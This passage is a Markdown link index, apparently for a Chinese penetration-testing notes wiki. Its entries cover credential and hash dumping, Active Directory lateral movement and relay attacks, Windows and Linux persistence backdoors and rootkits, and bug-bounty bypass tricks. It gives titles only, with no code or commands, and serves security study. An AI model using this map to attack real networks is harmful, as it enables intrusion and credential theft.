- [Quarks-pwdump](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/缓存HASH获取/Quarks-pwdump.md)
- [注册表](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/缓存HASH获取/注册表.md)
- [Empire](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/Empire.md)
- [Invoke-Dcsync](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/Invoke-Dcsync.md)
- [laZagne](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/laZagne.md)
- [获取其他密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/获取其他密码/README.md)
- [chrome](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/获取其他密码/chrome.md)
- [firefox](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/获取其他密码/firefox.md)
- [foxmail](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/获取其他密码/foxmail.md)
- [navicat](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/获取其他密码/navicat.md)
- [seatbelt](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/获取其他密码/seatbelt.md)
- [securecrt](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/获取其他密码/securecrt.md)
- [vncpass](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/获取其他密码/vncpass.md)
- [破解工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/破解工具/README.md)
- [hydra](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/破解工具/hydra.md)
- [medusa](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/破解工具/medusa.md)
- [横向移动](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/README.md)
- [添加域管命令](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/添加域管命令.md)
- [探测存活主机](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测存活主机/README.md)
- [For+Ping命令查询存活主机](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测存活主机/For+Ping命令查询存活主机.md)
- [MSF](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测存活主机/MSF.md)
- [NbtScan](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测存活主机/NbtScan.md)
- [NetDiscover](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测存活主机/NetDiscover.md)
- [NMAP](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测存活主机/NMAP.md)
- [rp-scan](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测存活主机/rp-scan.md)
- [代理nmap扫描](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测存活主机/代理nmap扫描.md)
- [内外网资产对应](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测存活主机/内外网资产对应.md)
- [探测服务&端口](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测服务&端口/README.md)
- [CobaltStrike+K8Aggressor](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测服务&端口/CobaltStrike+K8Aggressor.md)
- [Linux_Samba服务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测服务&端口/Linux_Samba服务.md)
- [Masscan](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测服务&端口/Masscan.md)
- [MSF](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测服务&端口/MSF.md)
- [Nc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测服务&端口/Nc.md)
- [常见端口](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测服务&端口/常见端口.md)
- [Powershell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测服务&端口/Powershell.md)
- [PTScan](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测服务&端口/PTScan.md)
- [SMB](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/探测服务&端口/SMB.md)
- [执行命令&IPC&计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/执行命令&IPC&计划任务/README.md)
- [AT](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/执行命令&IPC&计划任务/AT.md)
- [IPC](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/执行命令&IPC&计划任务/IPC.md)
- [Schtasks](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/执行命令&IPC&计划任务/Schtasks.md)
- [Wmic](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/执行命令&IPC&计划任务/Wmic.md)
- [共享](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/共享.md)
- [快速定位域管理登过的机器](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/快速定位域管理登过的机器.md)
- [MSF管道监听](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/MSF管道监听.md)
- [MSF添加路由](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/MSF添加路由.md)
- [代理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/README.md)
- [chisel](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/chisel.md)
- [earthworm](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/earthworm.md)
- [frp](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/frp.md)
- [goproxy](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/goproxy.md)
- [shadowsocks](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/shadowsocks.md)
- [sock4a](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/sock4a.md)
- [socks5](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/socks5.md)
- [socks5web](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/socks5web.md)
- [SSF](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/ssf.md)
- [SSH](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/ssh.md)
- [Gost](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/Gost.md)
- [revsocks](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/revsocks.md)
- [GoToHTTP](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/GoToHTTP.md)
- [RustDesk](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/RustDesk.md)
- [代理软件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/代理/代理软件.md)
- [Ngrok内网穿透](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/Ngrok内网穿透.md)
- [MS08_067](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/MS08_067.md)
- [MS17_010](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/MS17_010.md)
- [方程式内网不产生session](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/方程式内网不产生session.md)
- [域内爆破](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/域内爆破.md)
- [隔离主机payload](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/隔离主机payload.md)
- [PASS-THE-HASH](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/PASS-THE-HASH.md)
- [PASS-THE-TICKET](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/PASS-THE-TICKET.md)
- [PASS-THE-KEY](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/PASS-THE-KEY.md)
- [ASEPRoasting](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ASEPRoasting.md)
- [攻击MSSQL数据库](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/攻击MSSQL数据库.md)
- [攻击MySQL数据库](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/攻击MySQL数据库.md)
- [账户委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/账户委派.md)
- [kerberos约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos约束委派.md)
- [kerberos无约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos无约束委派.md)
- [kerberos青铜比特攻击CVE-2020-17049](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/kerberos青铜比特攻击CVE-2020-17049.md)
- [基于kerberos资源的约束委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/基于kerberos资源的约束委派.md)
- [CVE-2019-0708](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/CVE-2019-0708.md)
- [获取保存的RDP密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/获取保存的RDP密码.md)
- [GPP-Password](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/GPP-Password.md)
- [Kerberoasting](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/Kerberoasting/README.md)
- [申请票据](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/Kerberoasting/申请票据.md)
- [破解密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/Kerberoasting/破解密码.md)
- [导出票据](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/Kerberoasting/导出票据.md)
- [SPN发现](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/Kerberoasting/SPN发现.md)
- [GetUserSPNs](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/Kerberoasting/GetUserSPNs.md)
- [重写票据](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/Kerberoasting/重写票据.md)
- [NTLM中继和中间人攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/README.md)
- [Ntlmrelayx+资源受限委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/Ntlmrelayx+资源受限委派.md)
- [Responder+LLMNR毒害](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/Responder+LLMNR毒害.md)
- [捕获和破解Net-NTLMv1和NTLMv1哈希](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/捕获和破解Net-NTLMv1和NTLMv1哈希.md)
- [CVE-2019-1040](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/CVE-2019-1040.md)
- [CVE-2019-1384](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/CVE-2019-1384.md)
- [DNS-Poisonning](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/DNS-Poisonning.md)
- [MS08-068-NTLM反射](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/MS08-068-NTLM反射.md)
- [RemotePotato0](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/RemotePotato0.md)
- [SMB签名禁用和IPv4](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/SMB签名禁用和IPv4.md)
- [SMB签名禁用和IPv6](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/SMB签名禁用和IPv6.md)
- [WebDav中继](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/NTLM中继和中间人攻击/WebDav中继.md)
- [资源受限委派](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/资源受限委派.md)
- [WinRM无文件执行](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/WinRM无文件执行.md)
- [组策略对象GPO](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/组策略对象GPO.md)
- [危险的内置组使用](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/危险的内置组使用.md)
- [ActiveDirectory证书服务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/README.md)
- [查找证书服务器](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/查找证书服务器.md)
- [ESC1-配置错误的证书模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC1-配置错误的证书模板.md)
- [ESC2-配置错误的证书模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC2-配置错误的证书模板.md)
- [ESC3-配置错误的注册代理模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC3-配置错误的注册代理模板.md)
- [ESC4-访问控制漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC4-访问控制漏洞.md)
- [ESC6-EDITF_ATTRIBUTESUBJECTALTNAME2](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC6-EDITF_ATTRIBUTESUBJECTALTNAME2.md)
- [ESC7-易受攻击的证书颁发机构访问控制](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC7-易受攻击的证书颁发机构访问控制.md)
- [ESC8-ADCS中继攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/ESC8-ADCS中继攻击.md)
- [经过认证的CVE-2022-26923](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/经过认证的CVE-2022-26923.md)
- [Pass-The-Certificate](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory证书服务/Pass-The-Certificate.md)
- [ActiveDirectory的ACL和ACE](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/README.md)
- [GenericAll](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/GenericAll.md)
- [GenericWrite](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/GenericWrite.md)
- [WriteDACL](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/WriteDACL.md)
- [WriteOwner](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/WriteOwner.md)
- [读取GMSA密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/读取GMSA密码.md)
- [读取LAPS密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/读取LAPS密码.md)
- [强制更改密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/ActiveDirectory的ACL和ACE/强制更改密码.md)
- [DCOM-Exploitation](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/README.md)
- [DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/DCOM.md)
- [通过MMC应用程序类进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过MMC应用程序类进行DCOM.md)
- [通过Office进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过Office进行DCOM.md)
- [通过ShellExecute进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过ShellExecute进行DCOM.md)
- [通过ShellBrowserWindow进行DCOM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/DCOM-Exploitation/通过ShellBrowserWindow进行DCOM.md)
- [域与域](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/域与域.md)
- [SCCM部署](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/SCCM部署.md)
- [WSUS部署](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/WSUS部署.md)
- [PrivExchange攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/PrivExchange攻击.md)
- [RODC-只读域控制器入侵](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/RODC-只读域控制器入侵.md)
- [PXE启动映像攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/PXE启动映像攻击.md)
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/README.md)
- [Windows](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/README.md)
- [关闭防病毒软件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/关闭防病毒软件.md)
- [启动文件夹](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/启动文件夹.md)
- [Invoke-ADSBackdoor](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Invoke-ADSBackdoor.md)
- [ADS隐藏webshell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/ADS隐藏webshell.md)
- [ADS&JavaScript](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/ADS&JavaScript.md)
- [使用AMSI扫描接口维持权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/使用AMSI扫描接口维持权限.md)
- [Bitadmin](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Bitadmin.md)
- [CLR Injection](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/CLR-Injection.md)
- [COM OBJECT hijacking](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/COM-OBJECT-hijacking.md)
- [受限委派后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/受限委派后门.md)
- [通过控制面板加载项维持权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/通过控制面板加载项维持权限.md)
- [创建服务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/创建服务.md)
- [DCShadow&SIDHistory](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/DCShadow&SIDHistory.md)
- [DCSync后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/DCSync后门.md)
- [DLL劫持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/DLL劫持.md)
- [DLL注入](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/DLL注入.md)
- [DLL代理劫持右键](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/DLL代理劫持右键.md)
- [DLL劫持计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/DLL劫持计划任务.md)
- [通过自定义.net垃圾回收机制进行DLL注入](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/通过自定义.net垃圾回收机制进行DLL注入.md)
- [DSRM+注册表ACL后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/DSRM+注册表ACL后门.md)
- [Empire](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Empire.md)
- [Windows FAX DLL Injection](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Windows-FAX-DLL-Injection.md)
- [Guest激活](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Guest激活.md)
- [映像劫持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/映像劫持.md)
- [HookPasswordChangeNotify](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/HookPasswordChangeNotify.md)
- [Kerberoasting后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Kerberoasting后门.md)
- [登录初始化](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/登录初始化.md)
- [Metsvc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Metsvc.md)
- [MOF](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/MOF.md)
- [MSSQL后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/MSSQL后门.md)
- [Netsh Helper DLL](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Netsh-Helper-DLL.md)
- [NPPSpy记录密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/NPPSpy记录密码.md)
- [NSSM](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/NSSM.md)
- [唯一IP访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/唯一IP访问.md)
- [Password Filter DLL](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Password-Filter-DLL.md)
- [Persistence](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Persistence.md)
- [基于域策略文件权限后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/基于域策略文件权限后门.md)
- [进程注入](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/进程注入.md)
- [Invoke-Tasks权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Invoke-Tasks权限维持.md)
- [WMI-Persistence](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/WMI-Persistence.md)
- [RID劫持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/RID劫持.md)
- [rootkit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/rootkit.md)
- [S4U2Self后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/S4U2Self后门.md)
- [计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/计划任务.md)
- [影子用户](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/影子用户.md)
- [添加签名](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/添加签名.md)
- [Skeleton Key万能钥匙](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Skeleton-Key万能钥匙.md)
- [Squibledoo](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Squibledoo.md)
- [注入SSP被动收集密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/注入SSP被动收集密码.md)
- [WinRM端口复用](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/WinRM端口复用.md)
- [WMIC事件订阅](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/WMIC事件订阅.md)
- [RPC后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/RPC后门.md)
- [Shadow-Credentials](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/Shadow-Credentials.md)
- [动态调用进程注入逻辑](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/动态调用进程注入逻辑.md)
- [通过挂起EventLog服务线程禁用Windows事件日志](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/通过挂起EventLog服务线程禁用Windows事件日志.md)
- [隐藏windows服务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/隐藏windows服务.md)
- [ImportDLLInjection-通过修改内存中的PE头来注入DLL的另一种方法](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/ImportDLLInjection-通过修改内存中的PE头来注入DLL的另一种方法.md)
- [父进程破坏](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/父进程破坏.md)
- [进程挖空(MitreT1055.012)](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Windows/进程挖空(MitreT1055.012).md)
- [Linux](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/README.md)
- [Linux cron后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Linux-cron后门.md)
- [文件处理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/文件处理.md)
- [IPTables端口复用](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/IPTables端口复用.md)
- [Kbeast_rootkit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Kbeast_rootkit.md)
- [OpenSSH后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/OpenSSH后门.md)
- [进程注入](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/进程注入.md)
- [Reptile](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Reptile.md)
- [SSHD后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSHD后门.md)
- [SSH公私钥登录](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH公私钥登录.md)
- [SSH wrapper后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH-wrapper后门.md)
- [Strace记录ssh密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Strace记录ssh密码.md)
- [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
- [apt后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/apt后门.md)
- [bash_rc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/bash_rc.md)
- [后门驱动程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/后门驱动程序.md)
- [启动项服务后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/启动项服务后门.md)
- [用户启动文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/用户启动文件.md)
- [web服务&中间件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/README.md)
- [Apache](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/Apache.md)
- [IIS](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/IIS.md)
- [Java](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/Java.md)
- [Nginx](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/Nginx.md)
- [赏金技巧](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/README.md)
- [2FA双因子认证绕过](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/2FA双因子认证绕过.md)
- [403 bypass](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/403-bypass.md)
- [命令注入Bypass](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/命令注入Bypass.md)
- [配置错误的云存储桶](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/配置错误的云存储桶.md)
- [CMS](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/CMS.md)
- [字典](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/字典/README.md)
- [从站点生成字典](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/字典/从站点生成字典.md)
- [查找git和svn的字典](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/字典/查找git和svn的字典.md)
- [已泄露的密码整理出的字典](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/字典/已泄露的密码整理出的字典.md)
- [loT高频率账户密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/字典/loT高频率账户密码.md)
